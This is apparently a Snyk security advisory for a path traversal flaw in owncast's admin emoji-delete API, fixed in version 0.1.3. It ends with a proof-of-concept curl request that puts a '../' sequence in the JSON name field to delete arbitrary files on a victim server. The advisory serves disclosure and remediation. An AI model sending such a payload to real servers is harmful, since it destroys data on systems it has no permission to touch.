Path Traversal Affecting github.com/owncast/owncast/controllers/admin package, versions <0.1.3


0.0
medium

Snyk CVSS

    Attack Complexity Low
    Privileges Required High
    Scope Changed

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.05% (15th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-GOLANG-GITHUBCOMOWNCASTOWNCASTCONTROLLERSADMIN-6669946
  • published 21 Apr 2024
  • disclosed 19 Apr 2024
  • credit Tony Torralba

How to fix?

Upgrade github.com/owncast/owncast/controllers/admin to version 0.1.3 or higher.

Overview

github.com/owncast/owncast/controllers/admin is a module for live stream video and chat

Affected versions of this package are vulnerable to Path Traversal via the DeleteCustomEmoji() function in the emoji/delete endpoint of the /api/admin API. Admin users can delete arbitrary files on the system, outside of the emoji directory, by supplying a malicious filepath in the JSON input.

PoC

curl -X 'POST' \
    -H 'Authorization: Basic <ADMIN_CREDENTIALS>' \
    --data '{"name":"../../../../../../../tmp/test"}' \
    'http://(victim_server):8080/api/admin/emoji/delete'